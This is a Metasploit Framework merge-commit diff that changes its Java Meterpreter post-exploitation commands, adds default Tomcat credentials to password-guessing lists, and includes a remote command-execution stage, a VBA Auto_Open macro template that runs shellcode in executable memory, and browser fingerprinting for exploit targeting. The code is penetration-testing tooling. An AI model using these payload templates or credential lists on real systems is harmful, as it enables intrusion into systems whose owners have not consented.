Merge branch 'rapid7'

Conflicts: lib/rex/exploitation/javascriptosdetect.rb
2012-04-05 15:16:56 -06:00
parent 70ab8c018f 585245501a
commit 6ef4257947
45 changed files with 2426 additions and 1037 deletions
@@ -1,5 +1,10 @@
 data/meterpreter/ext_server_pivot.dll
 data/meterpreter/ext_server_pivot.x64.dll
+external/source/meterpreter/java/bin
+external/source/meterpreter/java/build
+external/source/meterpreter/java/extensions
+external/source/javapayload/bin
+external/source/javapayload/build
 tags
 *.swp
 *.orig
@@ -3,3 +3,4 @@ manager
 role1
 root
 tomcat
+s3cret
@@ -4,3 +4,4 @@ cxsdk kdsxc
 root owaspbwa
 ADMIN ADMIN
 xampp xampp
+tomcat s3cret
@@ -1,60 +0,0 @@
-/*
- * Java Payloads.
- * 
- * Copyright (c) 2010, Michael 'mihi' Schierl
- * All rights reserved.
- * 
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 
- * - Redistributions of source code must retain the above copyright notice,
- *   this list of conditions and the following disclaimer.
- *   
- * - Redistributions in binary form must reproduce the above copyright
- *   notice, this list of conditions and the following disclaimer in the
- *   documentation and/or other materials provided with the distribution.
- *   
- * - Neither name of the copyright holders nor the names of its
- *   contributors may be used to endorse or promote products derived from
- *   this software without specific prior written permission.
- *   
- * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND THE CONTRIBUTORS
- * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
- * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
- * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
- * HOLDERS OR THE CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
- * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
- * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
- * OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
- * ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
- * TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
- * USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
- */
-
-package javapayload.stage;
-
-import java.io.DataInputStream;
-import java.io.OutputStream;
-
-public class Exec implements Stage {
-
-	public void start(DataInputStream in, OutputStream out, String[] parameters) throws Exception {
-		for (int i = 0; i < parameters.length; i++) {
-			if (parameters[i].equals("--")) {
-				// separator found. The next parameter will be the module name, and
-				// all remaining parameters are for exec.
-				final String[] cmdarray = new String[parameters.length - i - 2];
-				System.arraycopy(parameters, i + 2, cmdarray, 0, cmdarray.length);
-				final Process proc = Runtime.getRuntime().exec(cmdarray);
-				new StreamForwarder(in, proc.getOutputStream(), out).start();
-				new StreamForwarder(proc.getInputStream(), out, out).start();
-				new StreamForwarder(proc.getErrorStream(), out, out).start();
-				proc.waitFor();
-				in.close();
-				out.close();
-				break;
-			}
-		}
-	}
-}
@@ -1,7 +1,7 @@
 /*
 * Java Payloads.
 * 
- * Copyright (c) 2010, Michael 'mihi' Schierl
+ * Copyright (c) 2010, 2011 Michael 'mihi' Schierl
 * All rights reserved.
 * 
 * Redistribution and use in source and binary forms, with or without
@@ -1,7 +1,7 @@
 /*
 * Java Payloads.
 * 
- * Copyright (c) 2010, Michael 'mihi' Schierl
+ * Copyright (c) 2010, 2011 Michael 'mihi' Schierl
 * All rights reserved.
 * 
 * Redistribution and use in source and binary forms, with or without
@@ -1,7 +1,7 @@
 /*
 * Java Payloads.
 * 
- * Copyright (c) 2010, Michael 'mihi' Schierl
+ * Copyright (c) 2010, 2011 Michael 'mihi' Schierl
 * All rights reserved.
 * 
 * Redistribution and use in source and binary forms, with or without
@@ -41,6 +41,10 @@ import java.io.PrintStream;

 public class StreamForwarder extends Thread {
 	public static void forward(InputStream in, OutputStream out) throws IOException {
+		forward(in, out, true);
+	}
+	
+	public static void forward(InputStream in, OutputStream out, boolean closeOut) throws IOException {
 		try {
 			final byte[] buf = new byte[4096];
 			int length;
@@ -54,7 +58,8 @@ public class StreamForwarder extends Thread {
 			}
 		} finally {
 			in.close();
-			out.close();
+			if (closeOut)
+				out.close();
 		}
 	}

@@ -62,18 +67,33 @@ public class StreamForwarder extends Thread {
 	private final OutputStream out;

 	private final OutputStream stackTraceOut;
+	private final boolean closeOut;

 	public StreamForwarder(InputStream in, OutputStream out, OutputStream stackTraceOut) {
+		this(in,out,stackTraceOut,true);
+	}
+	public StreamForwarder(InputStream in, OutputStream out, OutputStream stackTraceOut, boolean closeOut) {
 		this.in = in;
 		this.out = out;
 		this.stackTraceOut = stackTraceOut;
+		this.closeOut = closeOut;
 	}

 	public void run() {
 		try {
-			forward(in, out);
+			forward(in, out, closeOut);
 		} catch (final Throwable ex) {
-			ex.printStackTrace(new PrintStream(stackTraceOut));
+			if (stackTraceOut == null)
+				throwWrapped(ex);
+			ex.printStackTrace(new PrintStream(stackTraceOut, true));
+		}
+	}
+	
+	private static void throwWrapped(Throwable ex) {
+		/* #JDK1.4 */try {
+			throw new RuntimeException(ex);
+		} catch (NoSuchMethodError ex2) /**/{
+			throw new RuntimeException(ex.toString());
 		}
 	}
 }
@@ -63,21 +63,19 @@ public interface TLVType {
 	public static final int TLV_TYPE_HOST_NAME = TLVPacket.TLV_META_TYPE_STRING | 1400;
 	public static final int TLV_TYPE_PORT = TLVPacket.TLV_META_TYPE_UINT | 1401;
 	public static final int TLV_TYPE_MTU = TLVPacket.TLV_META_TYPE_UINT | 1402;
+	public static final int TLV_TYPE_INTERFACE_INDEX = TLVPacket.TLV_META_TYPE_UINT | 1404;

 	public static final int TLV_TYPE_SUBNET = TLVPacket.TLV_META_TYPE_RAW | 1420;
 	public static final int TLV_TYPE_NETMASK = TLVPacket.TLV_META_TYPE_RAW | 1421;
 	public static final int TLV_TYPE_GATEWAY = TLVPacket.TLV_META_TYPE_RAW | 1422;
 	public static final int TLV_TYPE_NETWORK_ROUTE = TLVPacket.TLV_META_TYPE_GROUP | 1423;
-	public static final int TLV_TYPE_SUBNET6 = TLVPacket.TLV_META_TYPE_RAW | 1424;
-	public static final int TLV_TYPE_NETMASK6 = TLVPacket.TLV_META_TYPE_RAW | 1425;
-	public static final int TLV_TYPE_GATEWAY6 = TLVPacket.TLV_META_TYPE_RAW | 1426;
-	public static final int TLV_TYPE_NETWORK_ROUTE6 = TLVPacket.TLV_META_TYPE_GROUP | 1427;
+	public static final int TLV_TYPE_IP_PREFIX = TLVPacket.TLV_META_TYPE_UINT | 1424;

 	public static final int TLV_TYPE_IP = TLVPacket.TLV_META_TYPE_RAW | 1430;
 	public static final int TLV_TYPE_MAC_ADDRESS = TLVPacket.TLV_META_TYPE_RAW | 1431;
 	public static final int TLV_TYPE_MAC_NAME = TLVPacket.TLV_META_TYPE_STRING | 1432;
 	public static final int TLV_TYPE_NETWORK_INTERFACE = TLVPacket.TLV_META_TYPE_GROUP | 1433;
-	public static final int TLV_TYPE_IP6 = TLVPacket.TLV_META_TYPE_RAW | 1434;
+	public static final int TLV_TYPE_IP6_SCOPE = TLVPacket.TLV_META_TYPE_RAW | 1434;

 	public static final int TLV_TYPE_SUBNET_STRING = TLVPacket.TLV_META_TYPE_STRING | 1440;
 	public static final int TLV_TYPE_NETMASK_STRING = TLVPacket.TLV_META_TYPE_STRING | 1441;
@@ -59,14 +59,18 @@ public class NotYetImplementedCommand implements Command {
 		typeNames.put(new Integer(TLVType.TLV_TYPE_STAT_BUF), "TLV_TYPE_STAT_BUF");
 		typeNames.put(new Integer(TLVType.TLV_TYPE_HOST_NAME), "TLV_TYPE_HOST_NAME");
 		typeNames.put(new Integer(TLVType.TLV_TYPE_PORT), "TLV_TYPE_PORT");
+		typeNames.put(new Integer(TLVType.TLV_TYPE_MTU), "TLV_TYPE_MTU");
+		typeNames.put(new Integer(TLVType.TLV_TYPE_INTERFACE_INDEX), "TLV_TYPE_INTERFACE_INDEX");
 		typeNames.put(new Integer(TLVType.TLV_TYPE_SUBNET), "TLV_TYPE_SUBNET");
 		typeNames.put(new Integer(TLVType.TLV_TYPE_NETMASK), "TLV_TYPE_NETMASK");
 		typeNames.put(new Integer(TLVType.TLV_TYPE_GATEWAY), "TLV_TYPE_GATEWAY");
 		typeNames.put(new Integer(TLVType.TLV_TYPE_NETWORK_ROUTE), "TLV_TYPE_NETWORK_ROUTE");
+		typeNames.put(new Integer(TLVType.TLV_TYPE_IP_PREFIX), "TLV_TYPE_IP_PREFIX");
 		typeNames.put(new Integer(TLVType.TLV_TYPE_IP), "TLV_TYPE_IP");
 		typeNames.put(new Integer(TLVType.TLV_TYPE_MAC_ADDRESS), "TLV_TYPE_MAC_ADDRESS");
 		typeNames.put(new Integer(TLVType.TLV_TYPE_MAC_NAME), "TLV_TYPE_MAC_NAME");
 		typeNames.put(new Integer(TLVType.TLV_TYPE_NETWORK_INTERFACE), "TLV_TYPE_NETWORK_INTERFACE");
+		typeNames.put(new Integer(TLVType.TLV_TYPE_IP6_SCOPE), "TLV_TYPE_IP6_SCOPE");
 		typeNames.put(new Integer(TLVType.TLV_TYPE_SUBNET_STRING), "TLV_TYPE_SUBNET_STRING");
 		typeNames.put(new Integer(TLVType.TLV_TYPE_NETMASK_STRING), "TLV_TYPE_NETMASK_STRING");
 		typeNames.put(new Integer(TLVType.TLV_TYPE_GATEWAY_STRING), "TLV_TYPE_GATEWAY_STRING");
@@ -0,0 +1,26 @@
+package com.metasploit.meterpreter.stdapi;
+
+import java.io.FileInputStream;
+import java.security.MessageDigest;
+
+import com.metasploit.meterpreter.Meterpreter;
+import com.metasploit.meterpreter.TLVPacket;
+import com.metasploit.meterpreter.TLVType;
+import com.metasploit.meterpreter.command.Command;
+
+public abstract class HashCommand implements Command {
+
+	protected abstract String getAlgorithm();
+
+	public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
+		FileInputStream in = new FileInputStream(Loader.expand(request.getStringValue(TLVType.TLV_TYPE_FILE_PATH)));
+		MessageDigest md = MessageDigest.getInstance(getAlgorithm());
+		byte[] buf = new byte[4096];
+		int len;
+		while ((len = in.read(buf)) != -1) {
+			md.update(buf, 0, len);
+		}
+		response.add(TLVType.TLV_TYPE_FILE_NAME, new String(md.digest(), "ISO-8859-1"));
+		return ERROR_SUCCESS;
+	}
+}
@@ -34,9 +34,11 @@ public class Loader implements ExtensionLoader {
 		mgr.registerCommand("stdapi_fs_getwd", stdapi_fs_getwd.class);
 		mgr.registerCommand("stdapi_fs_ls", stdapi_fs_ls.class);
 		mgr.registerCommand("stdapi_fs_mkdir", stdapi_fs_mkdir.class);
+		mgr.registerCommand("stdapi_fs_md5", stdapi_fs_md5.class);
 		mgr.registerCommand("stdapi_fs_search", stdapi_fs_search.class);
 		mgr.registerCommand("stdapi_fs_separator", stdapi_fs_separator.class);
 		mgr.registerCommand("stdapi_fs_stat", stdapi_fs_stat.class, V1_2, V1_6);
+		mgr.registerCommand("stdapi_fs_sha1", stdapi_fs_sha1.class);
 		mgr.registerCommand("stdapi_net_config_get_interfaces", stdapi_net_config_get_interfaces.class, V1_4, V1_6);
 		mgr.registerCommand("stdapi_net_config_get_routes", stdapi_net_config_get_routes.class, V1_4);
 		mgr.registerCommand("stdapi_net_socket_tcp_shutdown", stdapi_net_socket_tcp_shutdown.class, V1_2, V1_3);
@@ -0,0 +1,7 @@
+package com.metasploit.meterpreter.stdapi;
+
+public class stdapi_fs_md5 extends HashCommand {
+	protected String getAlgorithm() {
+		return "MD5";
+	}
+}
@@ -1,9 +1,6 @@
 package com.metasploit.meterpreter.stdapi;

-import java.io.ByteArrayOutputStream;
-import java.io.DataOutputStream;
 import java.io.File;
-import java.io.IOException;

 import com.metasploit.meterpreter.Meterpreter;
 import com.metasploit.meterpreter.TLVPacket;
@@ -0,0 +1,7 @@
+package com.metasploit.meterpreter.stdapi;
+
+public class stdapi_fs_sha1 extends HashCommand {
+	protected String getAlgorithm() {
+		return "SHA-1";
+	}
+}
@@ -3,7 +3,9 @@ package com.metasploit.meterpreter.stdapi;
 import java.io.IOException;
 import java.net.InetAddress;
 import java.net.NetworkInterface;
+import java.util.ArrayList;
 import java.util.Enumeration;
+import java.util.List;

 import com.metasploit.meterpreter.Meterpreter;
 import com.metasploit.meterpreter.TLVPacket;
@@ -13,52 +15,56 @@ import com.metasploit.meterpreter.command.Command;
 public class stdapi_net_config_get_interfaces_V1_4 extends stdapi_net_config_get_interfaces implements Command {

 	public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
+		int index = 0;
 		for (Enumeration ifaces = NetworkInterface.getNetworkInterfaces(); ifaces.hasMoreElements();) {
 			NetworkInterface iface = (NetworkInterface) ifaces.nextElement();
 			TLVPacket ifaceTLV = new TLVPacket();
-			byte[][] info = getInformation(iface);
-			if (info[0] != null) {
-				ifaceTLV.add(TLVType.TLV_TYPE_IP, info[0]);
-				ifaceTLV.add(TLVType.TLV_TYPE_NETMASK, info[1]);
-			} else {
-				ifaceTLV.add(TLVType.TLV_TYPE_IP, new byte[4]);
-				ifaceTLV.add(TLVType.TLV_TYPE_NETMASK, new byte[4]);
+			ifaceTLV.add(TLVType.TLV_TYPE_INTERFACE_INDEX, ++index);
+			Address[] addresses = getAddresses(iface);
+			for (int i = 0; i < addresses.length; i++) {
+				ifaceTLV.addOverflow(TLVType.TLV_TYPE_IP, addresses[i].address);
+				ifaceTLV.addOverflow(TLVType.TLV_TYPE_IP_PREFIX, new Integer(addresses[i].prefixLength));
+				if (addresses[i].scopeId != null) {
+					ifaceTLV.addOverflow(TLVType.TLV_TYPE_IP6_SCOPE, addresses[i].scopeId);
+				}
+			}
+			addMTU(ifaceTLV, iface);
+			byte[] mac = getMacAddress(iface);
+			if (mac != null) {
+				ifaceTLV.add(TLVType.TLV_TYPE_MAC_ADDRESS, mac);
+			} else {
+				// seems that Meterpreter does not like interfaces without
+				// mac address
+				ifaceTLV.add(TLVType.TLV_TYPE_MAC_ADDRESS, new byte[0]);
 			}
-			try {
-				ifaceTLV.add(TLVType.TLV_TYPE_MTU, iface.getMTU());
-			} catch (NoSuchMethodError e) { }
-
-			ifaceTLV.add(TLVType.TLV_TYPE_MAC_ADDRESS, info[2]);
 			ifaceTLV.add(TLVType.TLV_TYPE_MAC_NAME, iface.getName() + " - " + iface.getDisplayName());
 			response.addOverflow(TLVType.TLV_TYPE_NETWORK_INTERFACE, ifaceTLV);
 		}
 		return ERROR_SUCCESS;
 	}

+	protected void addMTU(TLVPacket ifaceTLV, NetworkInterface iface) throws IOException {
+		// not supported before 1.6
+	}
+
+	protected byte[] getMacAddress(NetworkInterface iface) throws IOException {
+		return null;
+	}
+
 	/**
-	 * Return information of this interface that cannot be determined the same way for all Java versions. Currently this includes ip, network mask and MAC address.
+	 * Return address information of this interface that cannot be determined
+	 * the same way for all Java versions.
 	 * 
 	 * @param iface
-	 * @return ip, network mask and MAC address
+	 * @return Array of {@link Interface}
 	 */
-	public byte[][] getInformation(NetworkInterface iface) throws IOException {
-		byte[] ip = null;
+	public Address[] getAddresses(NetworkInterface iface) throws IOException {
+		List/* <Address> */result = new ArrayList();
 		for (Enumeration en = iface.getInetAddresses(); en.hasMoreElements();) {
 			InetAddress addr = (InetAddress) en.nextElement();
-			if (addr.getAddress().length == 4) {
-				ip = addr.getAddress();
-				break;
-			}
-		}
-		if (ip == null) {
-			for (Enumeration en = iface.getInetAddresses(); en.hasMoreElements();) {
-				InetAddress addr = (InetAddress) en.nextElement();
-				ip = addr.getAddress();
-				break;
-			}
-		}
-		byte[] netmask = null;
-		if (ip != null) {
+			byte[] ip = addr.getAddress();
+			if (ip == null)
+				continue;
 			int prefixLength = 0;
 			if (ip.length == 4) {
 				// guess netmask by network class...
@@ -70,17 +76,24 @@ public class stdapi_net_config_get_interfaces_V1_4 extends stdapi_net_config_get
 					prefixLength = 24;
 				}
 			}
-			netmask = createNetworkMask(ip.length, prefixLength);
+			result.add(new Address(ip, prefixLength, null));
 		}
-		return new byte[][] { ip, netmask, new byte[6] };
+		return (Address[]) result.toArray(new Address[result.size()]);
 	}

-	protected static byte[] createNetworkMask(int length, int prefixLength) {
-		byte[] netmask = new byte[length];
-		for (int i = 0; i < prefixLength; i++) {
-			netmask[i / 8] |= (1 << (7 - (i % 8)));
+	/**
+	 * An IP address associated to an interface, together with a prefix length
+	 * and optionally a scope.
+	 */
+	protected static class Address {
+		public final byte[] address;
+		public final int prefixLength;
+		public final byte[] scopeId;
+
+		public Address(byte[] address, int prefixLength, byte[] scopeId) {
+			this.address = address;
+			this.prefixLength = prefixLength;
+			this.scopeId = scopeId;
 		}
-		return netmask;
 	}
 }
-
@@ -1,40 +1,42 @@
 package com.metasploit.meterpreter.stdapi;

 import java.io.IOException;
+import java.net.Inet6Address;
 import java.net.InterfaceAddress;
 import java.net.NetworkInterface;
+import java.nio.ByteBuffer;
+import java.nio.ByteOrder;
+import java.util.ArrayList;
 import java.util.Iterator;
 import java.util.List;

+import com.metasploit.meterpreter.TLVPacket;
+import com.metasploit.meterpreter.TLVType;
+
 public class stdapi_net_config_get_interfaces_V1_6 extends stdapi_net_config_get_interfaces_V1_4 {

-	public byte[][] getInformation(NetworkInterface iface) throws IOException {
-		byte[] ip = null;
+	public Address[] getAddresses(NetworkInterface iface) throws IOException {
+		List/* <Address> */result = new ArrayList();
 		List addresses = iface.getInterfaceAddresses();
-		int prefixLength = 0;
 		for (Iterator it = addresses.iterator(); it.hasNext();) {
 			InterfaceAddress addr = (InterfaceAddress) it.next();
-			if (addr.getAddress().getAddress().length == 4) {
-				ip = addr.getAddress().getAddress();
-				prefixLength = addr.getNetworkPrefixLength();
-				break;
+			byte[] ip = addr.getAddress().getAddress();
+			if (ip == null)
+				continue;
+			int prefixLength = addr.getNetworkPrefixLength();
+			byte[] scopeId = null;
+			if (addr.getAddress() instanceof Inet6Address) {
+				ByteBuffer bb = ByteBuffer.allocate(4);
+				bb.order(ByteOrder.BIG_ENDIAN);
+				bb.putInt(((Inet6Address) addr.getAddress()).getScopeId());
+				scopeId = bb.array();
 			}
+			result.add(new Address(ip, prefixLength, scopeId));
 		}
-		if (ip == null) {
-			for (Iterator it = addresses.iterator(); it.hasNext();) {
-				InterfaceAddress addr = (InterfaceAddress) it.next();
-				ip = addr.getAddress().getAddress();
-				prefixLength = addr.getNetworkPrefixLength();
-				break;
-			}
-		}
-		byte[] netmask = null;
-		if (ip != null) {
-			netmask = createNetworkMask(ip.length, prefixLength);
-		}
-		byte[] mac = iface.getHardwareAddress();
-		if (mac == null)
-			mac = new byte[6];
-		return new byte[][] { ip, netmask, mac };
+		return (Address[]) result.toArray(new Address[result.size()]);
+	}
+
+	protected void addMTU(TLVPacket ifaceTLV, NetworkInterface iface) throws IOException {
+		ifaceTLV.add(TLVType.TLV_TYPE_MTU, iface.getMTU());
 	}
 }
@@ -14,15 +14,26 @@ public class stdapi_net_config_get_routes_V1_4 extends stdapi_net_config_get_rou
 		stdapi_net_config_get_interfaces_V1_4 getIfaceCommand = (stdapi_net_config_get_interfaces_V1_4) meterpreter.getCommandManager().getCommand("stdapi_net_config_get_interfaces");
 		for (Enumeration ifaces = NetworkInterface.getNetworkInterfaces(); ifaces.hasMoreElements();) {
 			NetworkInterface iface = (NetworkInterface) ifaces.nextElement();
-			TLVPacket ifaceTLV = new TLVPacket();
-			byte[][] info = getIfaceCommand.getInformation(iface);
-			if (info[0] != null) {
-				ifaceTLV.add(TLVType.TLV_TYPE_SUBNET, info[0]);
-				ifaceTLV.add(TLVType.TLV_TYPE_NETMASK, info[1]);
-				ifaceTLV.add(TLVType.TLV_TYPE_GATEWAY, new byte[info[0].length]);
+			stdapi_net_config_get_interfaces_V1_4.Address[] addresses = getIfaceCommand.getAddresses(iface);
+			for (int i = 0; i < addresses.length; i++) {
+				TLVPacket ifaceTLV = new TLVPacket();
+				ifaceTLV.add(TLVType.TLV_TYPE_SUBNET, addresses[i].address);
+				int length = addresses[i].address.length;
+				ifaceTLV.add(TLVType.TLV_TYPE_NETMASK, createNetworkMask(length, addresses[i].prefixLength));
+				ifaceTLV.add(TLVType.TLV_TYPE_GATEWAY, new byte[length]);
 				response.addOverflow(TLVType.TLV_TYPE_NETWORK_ROUTE, ifaceTLV);
 			}
 		}
 		return ERROR_SUCCESS;
 	}
+
+	private static byte[] createNetworkMask(int length, int prefixLength) {
+		if (prefixLength > length * 8)
+			prefixLength = length * 8;
+		byte[] netmask = new byte[length];
+		for (int i = 0; i < prefixLength; i++) {
+			netmask[i / 8] |= (1 << (7 - (i % 8)));
+		}
+		return netmask;
+	}
 }
@@ -416,7 +416,13 @@ class ReadableText
 		framework.sessions.each_sorted { |k|
 			session = framework.sessions[k]

-			row = [ session.sid.to_s, session.type.to_s, session.info.to_s, session.tunnel_to_s + " (#{session.session_host})" ]
+			sinfo = session.info.to_s
+			# Arbitrarily cut it at 80 columns
+			if sinfo.length > 80
+				sinfo = sinfo[0,77] + "..."
+			end
+
+			row = [ session.sid.to_s, session.type.to_s, sinfo, session.tunnel_to_s + " (#{session.session_host})" ]
 			if session.respond_to? :platform
 				row[1] += " " + session.platform
 			end
@@ -208,7 +208,7 @@ public
 			w = {}
 			w[:name] = wspace.name
 			w[:created_at] = wspace.created_at.to_i
-			w[:modified_at] = wspace.modified_at.to_i
+			w[:updated_at] = wspace.updated_at.to_i
 			ret[:workspace] << w
 		end
 		ret
@@ -756,7 +756,7 @@ public
 		wspace.loots.all(:limit => limit, :offset => offset).each do |l|
 			loot = {}
 			loot[:host] = l.host.address if(l.host)
-			loot[:service] = l.service.name || n.service.port  if(n.service)
+			loot[:service] = l.service.name || l.service.port  if(l.service)
 			loot[:ltype] = l.ltype
 			loot[:ctype] = l.content_type
 			loot[:data] = l.data
@@ -857,11 +857,11 @@ require 'digest/sha1'
 			bytes << " _\r\n" if (idx > 1 and (idx % maxbytes) == 0)
 		end

-		"#If Vba7 Then 
+		"#If Vba7 Then
 Private Declare PtrSafe Function CreateThread Lib \"kernel32\" (ByVal #{var_lpThreadAttributes} As Long, ByVal #{var_dwStackSize} As Long, ByVal #{var_lpStartAddress} As LongPtr, #{var_lpParameter} As Long, ByVal #{var_dwCreationFlags} As Long, #{var_lpThreadID} As Long) As LongPtr
 Private Declare PtrSafe Function VirtualAlloc Lib \"kernel32\" (ByVal #{var_lpAddr} As Long, ByVal #{var_lSize} As Long, ByVal #{var_flAllocationType} As Long, ByVal #{var_flProtect} As Long) As LongPtr
 Private Declare PtrSafe Function RtlMoveMemory Lib \"kernel32\" (ByVal #{var_lDest} As LongPtr, ByRef #{var_Source} As Any, ByVal #{var_Length} As Long) As LongPtr
-#Else 
+#Else
 Private Declare Function CreateThread Lib \"kernel32\" (ByVal #{var_lpThreadAttributes} As Long, ByVal #{var_dwStackSize} As Long, ByVal #{var_lpStartAddress} As Long, #{var_lpParameter} As Long, ByVal #{var_dwCreationFlags} As Long, #{var_lpThreadID} As Long) As Long
 Private Declare Function VirtualAlloc Lib \"kernel32\" (ByVal #{var_lpAddr} As Long, ByVal #{var_lSize} As Long, ByVal #{var_flAllocationType} As Long, ByVal #{var_flProtect} As Long) As Long
 Private Declare Function RtlMoveMemory Lib \"kernel32\" (ByVal #{var_lDest} As Long, ByRef #{var_Source} As Any, ByVal #{var_Length} As Long) As Long
@@ -869,9 +869,9 @@ Private Declare Function RtlMoveMemory Lib \"kernel32\" (ByVal #{var_lDest} As L

 Sub Auto_Open()
 	Dim #{var_myByte} As Long, #{var_myArray} As Variant, #{var_offset} As Long
-#If Vba7 Then 
+#If Vba7 Then
 	Dim  #{var_rwxpage} As LongPtr, #{var_res} As LongPtr
-#Else 
+#Else
 	Dim  #{var_rwxpage} As Long, #{var_res} As Long
 #EndIf
 	#{var_myArray} = Array(#{bytes})
@@ -1011,7 +1011,7 @@ End Sub
 		vbs << "%>\r\n"
 		vbs
 	end
-	
+
 	def self.to_exe_aspx(exes = '', opts={})
 		exe = exes.unpack('C*')

@@ -1077,7 +1077,7 @@ End Sub
 	def self.to_win32pe_asp(framework, code, opts={})
 		to_exe_asp(to_win32pe(framework, code, opts), opts)
 	end
-	
+
 	def self.to_win32pe_aspx(framework, code, opts={})
 		to_exe_aspx(to_win32pe(framework, code, opts), opts)
 	end
@@ -1808,7 +1808,7 @@ End Sub

 		when 'aspx'
 			output = Msf::Util::EXE.to_win32pe_aspx(framework, code, exeopts)
-			
+
 		when 'war'
 			arch ||= [ ARCH_X86 ]
 			tmp_plat = plat.platforms if plat
@@ -0,0 +1,889 @@
+
+// Case matters, see lib/msf/core/constants.rb
+// All of these should match up with constants in ::Msf::HttpClients
+clients_opera = "Opera";
+clients_ie    = "MSIE";
+clients_ff    = "Firefox";
+clients_chrome= "Chrome";
+clients_safari= "Safari";
+
+// All of these should match up with constants in ::Msf::OperatingSystems
+oses_linux    = "Linux";
+oses_windows  = "Microsoft Windows";
+oses_mac_osx  = "MAC_OSX";
+oses_freebsd  = "FreeBSD";
+oses_netbsd   = "NetBSD";
+oses_openbsd  = "OpenBSD";
+
+// All of these should match up with the ARCH_* constants
+arch_armle    = "armle";
+arch_x86      = "x86";
+arch_x86_64   = "x86_64";
+arch_ppc      = "ppc";
+
+window.os_detect = function(){};
+
+/**
+ * This can reliably detect browser versions for IE and Firefox even in the
+ * presence of a spoofed User-Agent.  OS detection is more fragile and
+ * requires truthful navigator.appVersion and navigator.userAgent strings in
+ * order to be accurate for more than just IE on Windows.
+ **/
+window.os_detect.getVersion = function(){
+	//Default values:
+	var os_name;
+	var os_flavor;
+	var os_sp;
+	var os_lang;
+	var ua_name;
+	var ua_version;
+	var arch = "";
+	var useragent = navigator.userAgent;
+	// Trust but verify...
+	var ua_is_lying = false;
+
+	var version = "";
+
+	//--
+	// Client
+	//--
+	if (window.opera) {
+		ua_name = clients_opera;
+		if (!navigator.userAgent.match(/Opera/)) {
+			ua_is_lying = true;
+		}
+		// This seems to be completely accurate, e.g. "9.21" is the return
+		// value of opera.version() when run on Opera 9.21
+		ua_version = opera.version();
+		if (!os_name) {
+			// The 'inconspicuous' argument is there to give us a real value on
+			// Opera 6 where, without it, the return value is supposedly
+			// 'Hm, were you only as smart as Bjorn Vermo...'
+			// though I have not verfied this claim.
+			switch (opera.buildNumber('inconspicuous')) {
+				case "344":   // opera-9.0-20060616.1-static-qt.i386-en-344
+				case "2091":  // opera-9.52-2091.gcc3-shared-qt3.i386.rpm
+				case "2444":  // opera-9.60.gcc4-shared-qt3.i386.rpm
+				case "6386":  // 10.61
+					os_name = oses_linux;
+					break;
+				case "8502":  // "Opera 9 Eng Setup.exe"
+				case "8679":  // "Opera_9.10_Eng_Setup.exe"
+				case "8771":  // "Opera_9.20_Eng_Setup.exe"
+				case "8776":  // "Opera_9.21_Eng_Setup.exe"
+				case "8801":  // "Opera_9.22_Eng_Setup.exe"
+				case "10108": // "Opera_952_10108_en.exe"
+				case "10467": // "Opera_962_en_Setup.exe"
+				case "3445":  // 10.61
+					os_name = oses_windows;
+					break;
+				case "6386":  // 10.61
+					os_name = oses_mac_osx;
+					break;
+				//default:
+				//	document.write(opera.buildNumber('inconspicuous'));
+				//	break;
+			}
+		}
+	} else if (typeof window.onmousewheel != 'undefined') {
+		// Then this is webkit, could be Safari or Chrome.
+		// Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1
+		// Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
+		// Mozilla/5.0 (Linux; U; Android 2.2; en-au; GT-I9000 Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
+		// Mozilla/5.0 (iPod; U; CPU iPhone OS 4_2_1 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Mobile/8C148
+		// Mozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/7B405
+		// Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3
+
+		// Google Chrome has window.google (older versions), window.chromium (older versions), and window.window.chrome (3+)
+		if (window.chromium || window.google || window.chrome) {
+			ua_name = clients_chrome;
+			search = "Chrome";
+		} else {
+			ua_name = clients_safari;
+			search = "Version";
+		}
+
+		platform = navigator.platform.toLowerCase();
+		// Just to be a pain, iPod and iPad both leave off "Safari" and
+		// "Version" in the UA, see example above.  Grab the webkit version
+		// instead.  =/
+		if (platform.match(/ipod/)) {
+			os_name = oses_mac_osx;
+			os_flavor = "iPod";
+			arch = arch_armle;
+			search = "AppleWebKit";
+		} else if (platform.match(/ipad/)) {
+			os_name = oses_mac_osx;
+			os_flavor = "iPad";
+			arch = arch_armle;
+			search = "AppleWebKit";
+		} else if (platform.match(/iphone/)) {
+			os_name = oses_mac_osx;
+			os_flavor = "iPhone";
+			arch = arch_armle;
+		} else if (platform.match(/macintel/)) {
+			os_name = oses_mac_osx;
+			arch = arch_x86;
+		} else if (platform.match(/linux/)) {
+			os_name = oses_linux;
+			if (platform.match(/x86_64/)) {
+				arch = arch_x86_64;
+			} else if (platform.match(/arm/)) {
+				// Android and maemo
+				arch = arch_armle;
+			}
+		} else if (platform.match(/windows/)) {
+			os_name = oses_windows;
+		}
+
